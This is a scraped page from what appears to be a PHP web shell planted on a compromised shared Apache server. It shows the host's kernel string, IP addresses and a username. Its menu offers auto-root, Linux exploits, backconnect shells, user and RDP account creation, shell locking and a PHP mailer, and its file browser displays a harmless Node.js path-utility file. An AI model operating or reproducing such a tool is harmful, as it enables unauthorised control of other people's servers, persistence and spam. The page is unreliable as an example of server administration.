Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
@nodelib /
fs.walk /
src /
readers /
[ HOME SHELL ]
Name
Size
Permission
Action
async.spec.ts
6.62
KB
-rw-r--r--
async.ts
3.13
KB
-rw-r--r--
common.spec.ts
3.3
KB
-rw-r--r--
common.ts
852
B
-rw-r--r--
reader.spec.ts
762
B
-rw-r--r--
reader.ts
287
B
-rw-r--r--
sync.spec.ts
3.97
KB
-rw-r--r--
sync.ts
1.74
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : common.ts
import Settings, { FilterFunction } from '../settings'; import { Errno } from '../types'; export function isFatalError(settings: Settings, error: Errno): boolean { if (settings.errorFilter === null) { return true; } return !settings.errorFilter(error); } export function isAppliedFilter<T>(filter: FilterFunction<T> | null, value: T): boolean { return filter === null || filter(value); } export function replacePathSegmentSeparator(filepath: string, separator: string): string { return filepath.split(/[/\\]/).join(separator); } export function joinPathSegments(a: string, b: string, separator: string): string { if (a === '') { return b; } /** * The correct handling of cases when the first segment is a root (`/`, `C:/`) or UNC path (`//?/C:/`). */ if (a.endsWith(separator)) { return a + b; } return a + separator + b; }
Close